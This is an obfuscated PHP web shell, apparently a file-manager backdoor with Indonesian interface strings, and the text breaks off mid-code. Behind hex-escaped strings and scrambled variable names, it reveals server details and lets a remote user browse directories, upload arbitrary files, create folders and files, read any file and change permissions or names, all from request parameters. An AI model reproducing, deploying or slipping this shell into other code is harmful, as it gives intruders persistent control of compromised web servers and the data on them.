\x74y\x70\x65=\"tex\x74/\x63ss\x22/\x3e\n\x3ccent\x65r\x3e\n<s\x74\x79\x6c\x65\x20t\x79\x70\x65=\x22te\x78\x74/css\"\x3e\n\x62o\x64\x79\x20{\n\tfo\x6e\x74-\x66a\x6d\x69\x6cy:\x20Ke\x6cly\x20Sla\x62;\n\tba\x63\x6bgro\x75\x6e\x64-co\x6c\x6fr:
\x62l\x61ck;\n\tco\x6c\x6f\x72:
w\x68it\x65;\n\t}\n\x23\x63\x6fnt\x65n\x74\x20\x74r:h\x6f\x76er{\n\tba\x63\x6bg\x72\x6f\x75\x6ed-c\x6fl\x6f\x72:
\x67re\x79\x3b\n\t\x74e\x78t-s\x68a\x64o\x77:0\x70\x78\x200px\x2010\x70\x78\x20#\x30\x300000;\n\t}\n\x23co\x6ete\x6et
.\x66irst{\n\tc\x6f\x6co\x72:
#0\x30\x30\x30\x30\x30;\n\t\x62\x61c\x6b\x67rou\x6e\x64-imag\x65:u\x72\x6c(\x23);\n\t}\n#\x63ont\x65\x6e\x74\x20\x2efi\x72st:hov\x65r{\n\t\x62\x61ckg\x72o\x75n\x64-c\x6f\x6co\x72:\x20gre\x79;\n\t\x74ex\x74-s\x68a\x64\x6fw:\x30px
\x30\x70\x78
1p\x78\x20\x23\x33\x339\x3900;\n\t}\ntabl\x65,\x20\x74h,\x20t\x64
{\n\t\t\x62o\x72der-\x63ol\x6ca\x70\x73\x65:c\x6fll\x61\x70s\x65\x3b\n\t\t\x70\x61ddin\x67:\x205\x70x\x3b\n\t\tco\x6cor:
\x77h\x69t\x65;\n\t\t}\n\x2e\x74\x61\x62l\x65_\x68ome,\x20\x2et\x68_ho\x6d\x65,
\x2e\x74\x64\x5f\x68ome\x20{ \n\t\tco\x6cor:
\x77hit\x65\x3b\n\t\t\x62o\x72\x64\x65\x72:\x20\x32px\x20\x73\x6flid\x20g\x72ey;\n\t\tp\x61ddi\x6e\x67:
7\x70\x78\x3b\n\t\t}\na{\n\t\x66o\x6e\x74-\x73iz\x65:
1\x39p\x78\x3b\n\tco\x6co\x72:
\x23\x300\x66\x6600\x3b\n\t\x74ex\x74-d\x65\x63or\x61\x74\x69on:
none;\n\t}\n\x61:\x68ove\x72{\n\tcolo\x72:
\x77\x68\x69\x74e\x3b\n\t\x74e\x78\x74-\x73\x68\x61\x64\x6f\x77:0p\x78\x20\x30\x70x
\x310p\x78
#339\x3900\x3b\n\t}\ni\x6ep\x75\x74,sel\x65\x63t,\x74\x65x\x74are\x61{\n\tbo\x72\x64\x65\x72:\x201p\x78\x20\x23ff\x66ff\x66
\x73\x6fli\x64\x3b\n\t-\x6doz-b\x6frd\x65r-r\x61\x64ius:
5\x70x;\n\t-we\x62kit-bor\x64\x65r-\x72a\x64iu\x73:\x35\x70x\x3b\n\tbor\x64\x65\x72-\x72\x61\x64i\x75s:\x35p\x78;\n\t}\n\x2eclo\x73\x65
{\n\tov\x65\x72\x66\x6c\x6fw: aut\x6f;\n\t\x62ord\x65r:\x201\x70\x78
\x73\x6flid \x77\x68i\x74e\x3b\n\tba\x63kground:
w\x68i\x74\x65\x3b\n\t\x63\x6f\x6cor: whi\x74\x65\x3b\n\t}\n\x2e\x72
{\n\t\x66\x6c\x6fat:\x20righ\x74\x3b\n\tt\x65\x78t-\x61\x6c\x69gn:\x20r\x69\x67\x68t\x3b\n\t}\n\x3c/s\x74\x79\x6c\x65>\n\n\x3ca\x20h\x72\x65f\x3d\x22?\x22\x3e<h\x31
\x73\x74\x79\x6c\x65\x3d\"font-fami\x6c\x79:\x20K\x65\x6cly\x20\x53l\x61b\x3b\x20\x66ont-\x73\x69\x7ae:\x20\x33\x35\x70\x78;
c\x6f\x6c\x6fr:
w\x68\x69t\x65\x3b\x22>\n\x20</\x68\x31>\x3c/\x61\x3e\n\x3c\x42OD\x59>\n\n\x3c\x74a\x62l\x65\x20w\x69\x64t\x68=\x22\x395\x25\"\x20\x62o\x72der=\x22\x30\x22
\x63\x65\x6c\x6c\x70a\x64\x64\x69n\x67=\x22\x30\x22\x20cel\x6c\x73p\x61\x63i\x6e\x67=\x22\x30\"\x20\x61li\x67\x6e=\x22\x6cef\x74\"\x3e\n<\x74r\x3e\x3c\x74\x64>";echo"\x3ct\x72\x3e\x3c\x74\x64\x3e<fo\x6et
\x63o\x6c\x6f\x72=\x27\x77h\x69t\x65'\x3e\n\x3ci
c\x6cas\x73=\x27\x66a\x20\x66a-us\x65r\x27></i> <t\x64>:
\x3c\x66\x6f\x6e\x74\x20c\x6f\x6cor=\x27white\x27\x3e".$_SERVER["R\x45\x4d\x4f\x54E_AD\x44\x52"]."<tr><\x74\x64\x3e\x3c\x66ont
c\x6fl\x6fr=\x27w\x68it\x65'\x3e\n<\x69\x20\x63\x6ca\x73\x73=\x27fa
\x66a-de\x73k\x74\x6fp\x27\x3e</\x69>\x20<td\x3e:\x20<\x66o\x6et
\x63ol\x6fr=\x27w\x68\x69\x74e\x27\x3e".gethostbyname($_SERVER["HT\x54P\x5f\x48O\x53\x54"])."\x20/\x20".$_SERVER["\x53ERV\x45\x52_N\x41\x4d\x45"]."\x3c\x74r\x3e<\x74d><fon\x74
c\x6f\x6co\x72\x3d\x27w\x68ite\x27>\n<\x69\x20\x63\x6c\x61\x73s=\x27f\x61\x20fa-\x68\x64d-o\x27\x3e</\x69\x3e
\x3ct\x64\x3e:
<fon\x74\x20\x63\x6flor\x3d'\x77hi\x74e'\x3e".php_uname()."\x3c/f\x6fnt>\x3c/\x74\x72\x3e\x3c/\x74\x64\x3e\x3c/\x74a\x62\x6c\x65>";echo"<\x74ab\x6ce
width\x3d\x22\x395\x25\x22
\x62orde\x72=\"0\"\x20\x63e\x6c\x6c\x70add\x69\x6e\x67\x3d\"0\x22
cells\x70\x61c\x69ng\x3d\"\x30\"\x20\x61l\x69gn\x3d\"\x63e\x6e\x74e\x72\x22\x3e\n\x3ct\x72
alig\x6e=\"\x63\x65\x6e\x74er\"\x3e\x3ct\x64\x20al\x69\x67n=\"ce\x6ete\x72\x22><\x62\x72\x3e";${"\x47L\x4f\x42\x41\x4c\x53"}["\x70s\x64\x69yw\x78y\x69\x79"]="\x70\x61\x74";if(isset($_GET["path"])){${${"\x47L\x4fBA\x4cS"}["\x67fwr\x64\x6ao\x77\x78\x76tt"]}=$_GET["p\x61\x74h"];}else{${"GL\x4fB\x41LS"}["\x71\x62\x6a\x73t\x73b"]="pa\x74\x68";${${"GL\x4fBA\x4c\x53"}["\x71\x62\x6a\x73t\x73\x62"]}=getcwd();}${${"\x47\x4c\x4fB\x41\x4c\x53"}["g\x66w\x72\x64\x6a\x6fwxvtt"]}=str_replace("\x5c","/",${${"\x47L\x4f\x42\x41\x4c\x53"}["\x72\x75\x6d\x73\x64t\x74v\x78\x65\x74"]});${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x6amsk\x6c\x66\x6b\x64\x75u"]}=explode("/",${$okjvfcpqpxk});foreach(${${"G\x4c\x4fB\x41\x4c\x53"}["\x69\x6am\x73\x6b\x6cf\x6bd\x75\x75"]}
as${${"\x47\x4c\x4f\x42\x41LS"}["\x75\x6fam\x79\x71\x76\x76\x6c"]}=>${${"\x47LO\x42A\x4cS"}["\x70\x73\x64\x69y\x77x\x79\x69\x79"]}){${"GL\x4f\x42\x41\x4cS"}["g\x75\x71\x6e\x72\x66\x77\x75\x7a"]="p\x61t";if(${${"GL\x4f\x42\x41\x4c\x53"}["gu\x71\x6e\x72f\x77\x75z"]}==""&&${${"\x47\x4c\x4f\x42\x41LS"}["\x75\x6f\x61\x6dyq\x76vl"]}==0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["e\x6e\x6b\x65\x6a\x78\x76"]="\x61";${${"G\x4cO\x42A\x4c\x53"}["en\x6b\x65j\x78\x76"]}=true;echo"\x3c\x69
c\x6cass=\x22\x66\x61 f\x61-f\x6f\x6c\x64\x65\x72-o\"\x3e\x3c/\x69>
:\x20\x3c\x61\x20\x68\x72ef=\x22?\x70a\x74\x68\x3d/\x22\x3e/</\x61>";continue;}if(${${"\x47L\x4f\x42\x41L\x53"}["\x75u\x6a\x6e\x73\x77s\x72"]}=="")continue;$nuyktni="i";echo"<a
h\x72e\x66=\x22?\x70at\x68\x3d";for(${$nuyktni}=0;${${"\x47L\x4f\x42\x41L\x53"}["\x70\x75p\x77\x63\x6cg\x73\x77\x62\x6b\x77"]}<=${${"\x47\x4c\x4f\x42\x41L\x53"}["u\x6fa\x6d\x79\x71v\x76l"]};${${"G\x4cOBA\x4c\x53"}["\x70\x75p\x77\x63l\x67s\x77b\x6b\x77"]}++){$vcxkguu="\x69";$sgwbfryt="i\x64";echo"$paths[$i]";if(${$vcxkguu}!=${$sgwbfryt})echo"/";}echo"\"\x3e".${${"\x47LOB\x41\x4c\x53"}["\x75ujn\x73\x77\x73\x72"]}."</a\x3e/";}echo"
\x3ca\x20\x68r\x65f='?\x70a\x74\x68\x3d".getcwd()."'\x3e{\x48\x4fME}</\x61></br\x3e";echo"\x3c\x62r>\x3cbr\x3e\x3cb\x72\x3e<font
col\x6f\x72\x3d\"w\x68ite\x22>\x3cf\x6f\x72m\x20encty\x70\x65\x3d\x22m\x75lt\x69pa\x72t/\x66\x6fr\x6d-d\x61t\x61\x22
\x6d\x65t\x68\x6f\x64\x3d\x22\x50\x4fS\x54\x22>\n\x55\x70l\x6fa\x64
\x46\x69\x6ce:\x20<\x69\x6e\x70\x75t
t\x79\x70e=\"f\x69\x6c\x65\x22\x20\x6e\x61me\x3d\x22file\"\x20st\x79l\x65\x3d\"c\x6flor:\x77h\x69\x74\x65;\x62\x6frde\x72:\x32\x70\x78\x20\x73\x6fli\x64\x20whit\x65;\"\x20r\x65qu\x69r\x65d/\x3e\x3c/\x66o\x6e\x74\x3e\n\x3c\x69\x6ep\x75t\x20typ\x65=\x22s\x75\x62m\x69\x74\"
\x76a\x6cue\x3d\"\x55\x50L\x4fA\x44\x22
\x73\x74yl\x65=\"\x6d\x61rgi\x6e-t\x6fp:4\x70x;\x77\x69\x64\x74h:1\x300\x70\x78;h\x65i\x67h\x74:\x327\x70x\x3bfo\x6e\x74-\x66a\x6dily:K\x65l\x6cy
\x53lab;\x66o\x6e\x74-\x73i\x7a\x65:\x315\x3bb\x61ckgr\x6fund:b\x6cac\x6b;\x63\x6f\x6cor:\x20w\x68it\x65\x3bborde\x72:\x32\x70x
s\x6fl\x69d\x20w\x68\x69\x74\x65\x3b\x62or\x64\x65\x72-\x72\x61\x64\x69u\x73:\x35px\"/>";if(isset($_FILES["fil\x65"])){if(copy($_FILES["\x66\x69\x6c\x65"]["t\x6dp_na\x6de"],${${"\x47\x4cO\x42\x41\x4cS"}["\x67\x66w\x72\x64jo\x77\x78\x76\x74\x74"]}."/".$_FILES["\x66\x69le"]["n\x61\x6de"])){echo"<\x62\x72\x3e\x3cb\x72><fon\x74
co\x6c\x6fr=\"wh\x69\x74\x65\">\x55PLO\x41D
SUCC\x45S\x20!!\x21!</\x66on\x74\x3e<\x62\x72/\x3e";}else{echo"<\x73\x63\x72ipt\x3ea\x6ce\x72t(\"\x46il\x65\x20Ga\x67al\x20\x44iuplo\x61d
!!\")</s\x63\x72\x69\x70\x74\x3e";}}echo"</f\x6fr\x6d\x3e";echo"</\x62\x72>";echo"</b\x72\x3e";echo
"\x3cs\x74\x79\x6c\x65>\n\t\t.tampi\x6can-form\x20{\n\t\t\t\x64isp\x6c\x61\x79:
\x6eon\x65;\n\t\t\t\x70os\x69t\x69\x6fn:\x20fi\x78\x65d;\n\t\t\ttop:
\x350%\x3b\n\t\t\tl\x65f\x74:
\x35\x30%\x3b\n\t\t\tt\x72\x61\x6es\x66\x6frm:
tr\x61\x6e\x73\x6cate(-\x350\x25,\x20-50\x25)\x3b\n\t\t\tback\x67r\x6fu\x6e\x64:\x20wh\x69t\x65;\n\t\t\t\x70add\x69\x6eg:\x202\x30\x70x;\n\t\t\t\x62\x6frd\x65\x72:
1p\x78\x20so\x6c\x69d\x20\x62la\x63k\x3b\n\t\t\tz-in\x64\x65\x78:\x20\x39\x39\x39\x39\x3b\n\t\t}\n\t\t.\x74\x61m\x70\x69l\x61n-f\x6fr\x6d
\x69\x6eput[ty\x70e=\x22\x74\x65\x78t\"]
{\n\t\t\td\x69\x73pl\x61y:\x20\x62\x6co\x63\x6b\x3b\n\t\t\t\x6d\x61rg\x69n-\x62ot\x74o\x6d:
\x31\x30px\x3b\n\t\t}\n\t\t\x2e\x74\x61mp\x69\x6c\x61n-\x66or\x6d\x20bu\x74\x74\x6f\x6e
{\n\t\t\tma\x72g\x69\x6e-t\x6f\x70:
1\x30\x70x;\n\t\t}\n\t</sty\x6c\x65>\n\t<\x62\x75t\x74\x6f\x6e\x20\x6f\x6ec\x6cick=\"t\x61\x6d\x70\x69\x6ck\x61\x6eF\x6frm(\x27fo\x6c\x64\x65\x72')\x22\x20\x73ty\x6ce\x3d\x22\x6d\x61r\x67\x69n-\x74o\x70:\x34p\x78;wi\x64\x74\x68:\x39\x30p\x78;he\x69ght:27\x70x;f\x6f\x6e\x74-famil\x79:\x4belly\x20\x53lab;\x66o\x6e\x74-\x73\x69\x7ae:1\x35;\x62a\x63\x6bg\x72oun\x64:black\x3b\x63\x6f\x6cor:\x20wh\x69te\x3b\x62\x6fr\x64e\x72:2px\x20\x73\x6f\x6c\x69\x64\x20w\x68\x69t\x65;b\x6fr\x64\x65\x72-\x72\x61\x64\x69u\x73:\x35\x70\x78\x22>\x20F\x6f\x6cd\x65r</\x62\x75\x74t\x6f\x6e\x3e\n<b\x75\x74t\x6f\x6e
\x6fnclick=\"\x74\x61mp\x69\x6c\x6b\x61n\x46\x6f\x72\x6d('f\x69\x6ce\x27)\x22
\x73\x74y\x6c\x65=\x22\x6dar\x67i\x6e-to\x70:4px\x3b\x77i\x64\x74\x68:\x39\x30px\x3bh\x65\x69ght:2\x37px;f\x6fn\x74-f\x61m\x69l\x79:K\x65l\x6c\x79
S\x6cab\x3bfo\x6e\x74-\x73i\x7a\x65:15;b\x61ckg\x72\x6f\x75\x6ed:\x62\x6cac\x6b;\x63\x6f\x6cor:\x20whi\x74\x65\x3b\x62\x6f\x72\x64\x65r:\x32\x70x
s\x6fl\x69d
w\x68\x69te;\x62o\x72\x64e\x72-\x72\x61\x64iu\x73:5p\x78\x22\x3e
F\x69\x6ce</\x62u\x74\x74\x6f\x6e>\n\n\x3c\x66o\x72m\x20i\x64=\"f\x6f\x72m-f\x6f\x6cd\x65r\"
c\x6c\x61\x73\x73\x3d\"tam\x70\x69l\x61\x6e-f\x6f\x72m\"
\x6d\x65t\x68\x6f\x64\x3d\x22\x50\x4f\x53\x54\x22\x20a\x63t\x69on\x3d\"";echo
htmlspecialchars($_SERVER["PHP_\x53EL\x46"]);echo
"\x22>\n\t<\x6c\x61\x62el\x20\x66\x6fr=\"\x6ea\x6da-fo\x6c\x64e\x72\x22\x3eFold\x65\x72:</\x6c\x61\x62\x65\x6c\x3e\n\t\x3c\x69\x6epu\x74
ty\x70e\x3d\x22tex\x74\x22 id\x3d\"nam\x61-\x66ol\x64\x65\x72\x22
pl\x61\x63\x65h\x6f\x6c\x64\x65\x72\x3d\x22\x46old\x65r\"\x20nam\x65\x3d\x22n\x61m\x61-fo\x6c\x64er\"
\x73\x74\x79\x6c\x65=\x22p\x61d\x64\x69n\x67:\x205px\x3b\x20b\x6f\x72d\x65r-\x72\x61d\x69us:
5px; bo\x72\x64\x65r:\x20\x31p\x78 s\x6f\x6c\x69d
\x67r\x61\x79\x3b\x20w\x69\x64\x74\x68:
2\x350\x70x;\x22\x3e\n\t\x3c\x62u\x74\x74\x6f\x6e\x20typ\x65\x3d\"submi\x74\x22\x20s\x74yl\x65=\x22m\x61r\x67\x69\x6e-\x74op:4p\x78\x3b\x77id\x74\x68:9\x30px;he\x69\x67ht:\x327p\x78\x3bf\x6f\x6e\x74-f\x61\x6d\x69\x6c\x79:K\x65ll\x79\x20\x53\x6c\x61\x62\x3b\x66\x6f\x6et-\x73\x69z\x65:\x315;\x62ackgr\x6fu\x6ed:blac\x6b\x3bcol\x6fr:
\x77\x68ite;borde\x72:\x32p\x78
\x73ol\x69d\x20\x77\x68i\x74e;\x62\x6frd\x65r-r\x61d\x69\x75s:\x35px\"\x3eC\x72\x65\x61\x74\x3c/but\x74on>\n\t<\x62ut\x74on
t\x79pe\x3d\x22\x62\x75\x74t\x6fn\"
on\x63\x6c\x69c\x6b\x3d\x22ba\x74al\x46o\x72\x6d()\"\x20\x73\x74\x79\x6c\x65=\x22ma\x72g\x69\x6e-top:\x34p\x78;w\x69d\x74\x68:\x390p\x78\x3b\x68\x65\x69ght:\x32\x37p\x78\x3bf\x6f\x6e\x74-f\x61mi\x6cy:\x4be\x6c\x6cy
\x53\x6c\x61b;f\x6f\x6et-si\x7a\x65:15\x3b\x62a\x63\x6bg\x72o\x75nd:\x62\x6cack;color:
whit\x65\x3b\x62o\x72\x64\x65\x72:2\x70\x78
\x73\x6fl\x69d\x20\x77\x68\x69t\x65\x3b\x62\x6f\x72\x64er-\x72a\x64\x69\x75\x73:\x35p\x78\"\x3eCancel\x3c/\x62ut\x74o\x6e>\n\x3c/f\x6fr\x6d\x3e\n\n\x3cfo\x72\x6d\x20\x69\x64\x3d\"\x66\x6frm-f\x69\x6ce\"\x20c\x6c\x61ss=\"\x74\x61m\x70\x69\x6can-form\"
me\x74\x68o\x64=\x22P\x4f\x53\x54\x22\x20\x61ctio\x6e=\x22";echo
htmlspecialchars($_SERVER["\x50\x48\x50\x5fSEL\x46"]);echo
"\"\x3e\n\t<l\x61\x62e\x6c\x20for\x3d\"n\x61m\x61-\x66i\x6ce\x22>\x46il\x65:\x3c/l\x61\x62el\x3e\n\t\x3ci\x6e\x70\x75t
\x74\x79p\x65=\x22\x74ext\"\x20i\x64=\"\x6ea\x6da-f\x69le\x22
\x6e\x61\x6d\x65\x3d\"na\x6d\x61-\x66i\x6c\x65\x22\x20\x70\x6ca\x63ehol\x64\x65r\x3d\x22\x46i\x6ce\"
\x73t\x79l\x65\x3d\x22p\x61ddin\x67: \x35\x70x\x3b
bor\x64er-r\x61\x64i\x75s:\x205px;\x20bo\x72\x64e\x72:\x20\x31px\x20so\x6ci\x64\x20gr\x61y;\x20wi\x64\x74\x68:
250\x70\x78;\"\x3e\n\t\x3cbu\x74to\x6e\x20typ\x65\x3d\"\x73\x75\x62\x6dit\"
st\x79l\x65=\"\x6da\x72\x67\x69n-\x74\x6f\x70:\x34px;\x77id\x74h:\x39\x30\x70x\x3b\x68\x65\x69\x67ht:\x327p\x78\x3bf\x6fnt-\x66\x61\x6di\x6cy:\x4be\x6cl\x79
S\x6ca\x62\x3b\x66\x6f\x6et-si\x7a\x65:\x31\x35;bac\x6b\x67\x72\x6fu\x6ed:bla\x63\x6b\x3b\x63ol\x6fr:
w\x68i\x74e;\x62\x6fr\x64\x65r:\x32\x70x
so\x6cid\x20\x77\x68ite\x3b\x62order-\x72a\x64i\x75\x73:\x35p\x78\"\x3eC\x72ea\x74\x65</b\x75tton\x3e\n\t\x3c\x62\x75\x74\x74\x6fn\x20\x74y\x70\x65=\x22b\x75t\x74on\x22
\x6f\x6e\x63\x6cick=\"\x62a\x74\x61\x6cFo\x72\x6d()\x22\x20\x73tyl\x65\x3d\"m\x61r\x67in-t\x6fp:\x34\x70x\x3b\x77\x69\x64t\x68:90\x70x\x3bhe\x69\x67h\x74:\x32\x37p\x78;f\x6f\x6et-f\x61\x6d\x69\x6c\x79:K\x65l\x6cy\x20Slab;fon\x74-si\x7ae:\x315;\x62a\x63\x6bg\x72ou\x6ed:\x62la\x63k\x3bcolor:
\x77h\x69te\x3b\x62\x6fr\x64er:2px \x73o\x6c\x69d
white\x3b\x62\x6frde\x72-\x72\x61d\x69\x75s:\x35px\">\x43an\x63\x65l\x3c/b\x75\x74t\x6fn>\n\x3c/fo\x72m>\n\n";if($_SERVER["RE\x51UEST\x5f\x4d\x45T\x48O\x44"]=="\x50O\x53\x54"){if(!empty($_POST["n\x61ma-\x66\x6f\x6c\x64\x65\x72"])){if(mkdir($_POST["n\x61\x6d\x61-f\x6f\x6c\x64\x65r"])){echo"\x3c\x73c\x72ipt>\x61\x6c\x65\x72\x74(\x27\x46\x6f\x6cde\x72
\x53\x75c\x63es\x73\x20Cr\x65\x61te!')\x3b
\x77i\x6edo\x77.\x6cocat\x69\x6f\x6e\x20\x3d
w\x69\x6ed\x6f\x77\x2e\x6c\x6f\x63ati\x6fn.href\x3b\x3c/scri\x70\x74>";}else{echo"\x3cscrip\x74>a\x6c\x65rt('Fai\x6ced
\x43\x72e\x61te
fold\x65\x72\x21\x27)\x3b\x3c/\x73\x63\x72i\x70t>";}}elseif(!empty($_POST["na\x6d\x61-f\x69l\x65"])){$iiwxypeffbv="\x66\x69\x6c\x65";${$iiwxypeffbv}=fopen($_POST["\x6ea\x6d\x61-\x66\x69l\x65"],"\x77");if(${${"G\x4c\x4fB\x41L\x53"}["y\x70\x75\x6d\x75\x66\x62\x79z\x67"]}!==false){fclose(${${"G\x4c\x4f\x42\x41L\x53"}["yp\x75m\x75\x66by\x7a\x67"]});echo"\x3c\x73c\x72ip\x74\x3e\x61lert('\x46\x69le\x20Suc\x63\x65\x73\x73\x20\x43\x72eat\x65!\x27);
windo\x77.loca\x74io\x6e\x20=\x20\x77indo\x77\x2elocatio\x6e\x2e\x68\x72ef;</\x73\x63rip\x74\x3e";}else{echo"\x3c\x73c\x72\x69p\x74\x3e\x61l\x65\x72t(\x27F\x61il\x65\x64
Crea\x74\x65\x20\x66\x69\x6c\x65\x21\x27);</\x73c\x72\x69pt>";}}}echo
"\n\x3c\x73cript\x3e\n\nf\x75\x6ect\x69o\x6e\x20t\x61\x6dp\x69\x6cka\x6eFo\x72m(\x6ae\x6e\x69s)
{\n\t\t\x76\x61r\x20\x66\x6frm =
\x64o\x63umen\x74\x2e\x67\x65tE\x6c\x65m\x65n\x74\x42\x79I\x64(\x22\x66o\x72\x6d-\x22
+\x20j\x65n\x69s)\x3b\n\t\tform.sty\x6ce\x2e\x64\x69\x73p\x6ca\x79\x20=
\x22\x62\x6cock\x22\x3b\n\t}\n\n\tf\x75n\x63tion\x20ba\x74al\x46or\x6d()
{\n\t\t\x76a\x72 \x66\x6f\x72m\x73
=\x20do\x63\x75me\x6e\x74.g\x65tE\x6cemen\x74sByC\x6c\x61s\x73\x4eam\x65(\"\x74am\x70ilan-fo\x72m\x22)\x3b\n\t\t\x66o\x72
(\x76ar\x20i \x3d\x20\x30;\x20\x69\x20<
f\x6fr\x6ds\x2e\x6c\x65\x6e\x67th\x3b
i++)\x20{\n\t\t\tf\x6fr\x6d\x73[\x69]\x2esty\x6ce.\x64is\x70lay\x20\x3d
\x22n\x6fn\x65\";\n\t\t}\n\t}\n\n\tf\x75\x6ection\x20ta\x6d\x70i\x6c\x6ba\x6e\x46or\x6d(je\x6e\x69\x73)
{\n\t\t\x76a\x72\x20f\x6f\x72\x6d\x20\x3d
d\x6fc\x75m\x65\x6e\x74\x2e\x67e\x74\x45\x6ce\x6dent\x42y\x49\x64(\x22\x66\x6f\x72m-\x22\x20+
\x6ae\x6ei\x73)\x3b\n\t\t\x66o\x72m.st\x79\x6ce.\x64i\x73p\x6ca\x79\x20\x3d\x20\x22\x62l\x6f\x63k\x22\x3b\n\t}\n\n\tf\x75\x6ec\x74i\x6f\x6e\x20\x63l\x65\x61r1(){\n
\x20d\x6f\x63u\x6d\x65n\x74.\x67et\x45\x6cem\x65\x6et\x42\x79\x49d(\x22r\x65s\x75l\x74\x22).r\x65\x73e\x74()\x3b}\n\x3c/\x73\x63r\x69\x70t>\n\n\n";echo"</\x74d\x3e\x3c/tr>";if(isset($_GET["\x66\x69les\x72c"])){echo"<\x74r\x3e\x3c\x74d\x3efiles\x20\x3e\x3e
";echo$_GET["f\x69lesr\x63"];echo"\x3c/\x74\x72></t\x64\x3e\x3c/\x74a\x62\x6ce>\x3cb\x72
/>";echo("\x20\x3c\x74\x65xta\x72e\x61\x20
\x73\x74yle\x3d\"\x66o\x6et-siz\x65:
\x38\x70\x78\x3b\x20bo\x72de\x72:\x20\x31\x70x\x20\x73olid
\x77hite;\x20\x62\x61\x63kgrou\x6e\x64-\x63ol\x6fr:\x20\x62l\x61ck\x3b\x20c\x6flo\x72:
\x77h\x69t\x65;\x20\x77idth:
100%;h\x65\x69g\x68t:\x20\x31\x3200\x70\x78\x3b\x22
\x72\x65\x61\x64o\x6el\x79\x3e
".htmlspecialchars(file_get_contents($_GET["files\x72\x63"]))."</\x74\x65\x78t\x61\x72e\x61>");}elseif(isset($_GET["opti\x6fn"])&&$_POST["\x6fp\x74"]!="de\x6c\x65t\x65"){echo"\x3c/tab\x6c\x65><br\x20/\x3e\x3c\x63\x65\x6ete\x72>".$_POST["\x70ath"]."<\x62r\x20/><\x62\x72
/>";if($_POST["\x6fpt"]=="c\x68\x6dod"){if(isset($_POST["p\x65rm"])){if(chmod($_POST["pa\x74h"],$_POST["\x70\x65\x72\x6d"])){echo"<\x62r\x3e\x3cb\x72\x3e\x3cf\x6fnt
\x63\x6flor=\"w\x68ite\x22>\x43H\x41\x4e\x47E
P\x45RM\x49\x53S\x49O\x4e
S\x55\x43\x43\x45\x53S\x20\x21\x21</\x66on\x74>\x3c\x62\x72/\x3e";}else{echo"<\x73cri\x70\x74>\x61\x6ce\x72t(\"C\x68\x61\x6ege
P\x65rm\x69ss\x69on\x20\x47\x61\x67al
\x21\x21\")\x3c/\x73cr\x69\x70t\x3e";}}echo"<f\x6fr\x6d\x20me\x74h\x6fd\x3d\x22PO\x53T\">\n\x50er\x6di\x73\x73\x69\x6fn\x20:
\x3c\x69n\x70\x75\x74
\x6e\x61m\x65=\x22pe\x72\x6d\"\x20t\x79pe\x3d\"\x74\x65x\x74\x22\x20\x73\x69z\x65\x3d\"4\"
\x76alue=\"".substr(sprintf("%o",fileperms($_POST["\x70\x61\x74h"])),-4)."\x22
s\x74\x79le=\"widt\x68:\x380\x70\x78\x3b
h\x65\x69\x67h\x74:\x2030p\x78;\"/>\n\x3c\x69\x6e\x70u\x74
\x74\x79p\x65=\x22\x68\x69dden\x22 na\x6d\x65=\x22\x70\x61\x74\x68\"
\x76a\x6cu\x65=\"".$_POST["p\x61\x74\x68"]."\"\x3e\n\x3c\x69\x6ep\x75t
typ\x65=\x22h\x69dden\"\x20nam\x65\x3d\x22\x6fp\x74\x22
\x76a\x6c\x75e\x3d\"\x63hmo\x64\">\n\x3c\x69\x6e\x70u\x74
\x74\x79p\x65=\"\x73u\x62\x6d\x69t\x22
\x76al\x75\x65=\"Ut\x69wi\"\x20styl\x65\x3d\x22\x77\x69\x64\x74\x68:6\x30\x70x;\x20\x68e\x69ght:\x20\x330p\x78\x3b\x22/>\n\x3c/\x66o\x72\x6d>";}elseif($_GET["o\x70\x74"]=="btw"){$llluktfpyi="c\x77\x64";$dhscjpj="\x63\x77\x64";${${"\x47\x4c\x4fB\x41LS"}["\x79\x68n\x73\x63bw\x61\x79\x66"]}=getcwd();echo"<fo\x72m
\x61\x63\x74io\x6e\x3d\"?\x6f\x70\x74\x69on\x26\x70\x61th=".${$dhscjpj}."\x26o\x70t=\x64el\x65t\x65\x26t\x79pe\x3d\x62\x75a\x74\"\x20me\x74h\x6f\x64\x3d\x22P\x4f\x53\x54\x22>\n\x4e\x65w
\x4ea\x6d\x65\x20:\x20<\x69\x6e\x70\x75t
n\x61\x6de=\"\x6e\x61\x6de\x22 \x74\x79p\x65\x3d\"te\x78t\"
\x73i\x7a\x65=\"25\"\x20\x76\x61lue=\x22Fol\x64er\x22\x20\x73t\x79\x6ce\x3d\x22\x77\x69dth:\x330\x30\x70x;\x20h\x65\x69\x67\x68\x74:
3\x30\x70\x78;\x22/\x3e\n\x3c\x69\x6epu\x74
typ\x65\x3d\x22\x68\x69d\x64en\" n\x61m\x65=\x22\x70a\x74h\x22
\x76a\x6cu\x65=\x22".${$llluktfpyi}."\x22>\n\x3c\x69\x6ep\x75\x74
t\x79pe=\x22\x68i\x64d\x65n\x22\x20na\x6d\x65=\x22\x6fp\x74\"\x20va\x6cue=\"\x64\x65\x6ce\x74e\x22>\n<\x69npu\x74\x20\x74yp\x65=\x22s\x75\x62\x6d\x69t\x22\x20v\x61lu\x65\x3d\"Go\"\x20\x73\x74yle=\"\x77\x69\x64\x74h:1\x300px;\x20\x68e\x69\x67\x68\x74:
3\x30px;\"/\x3e\n</\x66\x6f\x72\x6d\x3e";}elseif($_POST["\x6fp\x74"]=="\x72\x65\x6e\x61m\x65"){if(isset($_POST["newname"])){if(rename($_POST["path"],${${"G\x4c\x4fBALS"}["g\x66w\x72\x64jo\x77\x78v\x74\x74"]}."/".$_POST["\x6eewn\x61\x6d\x65"])){echo"\x3c\x62r\x3e\x3c\x62r>\x3cf\x6f\x6et\x20c\x6f\x6co\x72=\x22w\x68i\x74\x65\">\x43HA\x4eG\x45\x20\x4eAME\x20\x53\x55\x43CES\x53
!\x21</\x66\x6f\x6et\x3e<br/\x3e";}else{echo"<\x73c\x72i\x70\x74>al\x65\x72\x74(\"\x43han\x67e\x20N\x61me\x20Ga\x67a\x6c
\x21\x21\")</\x73cr\x69p\x74>";}$_POST["\x6e\x61\x6d\x65"]=$_POST["n\x65\x77nam\x65"];}echo"<f\x6f\x72m
\x6dethod=\"\x50O\x53T\">\n\x4e\x65w
N\x61\x6de\x20:\x20\x3c\x69\x6ep\x75\x74\x20\x6ea\x6de=\x22\x6e\x65w\x6e\x61\x6d\x65\"
\x74ype=\"\x74e\x78t\x22\x20\x73ize=\"\x35\x22
\x73t\x79\x6c\x65\x3d\"\x77\x69d\x74h:\x32\x30\x25;
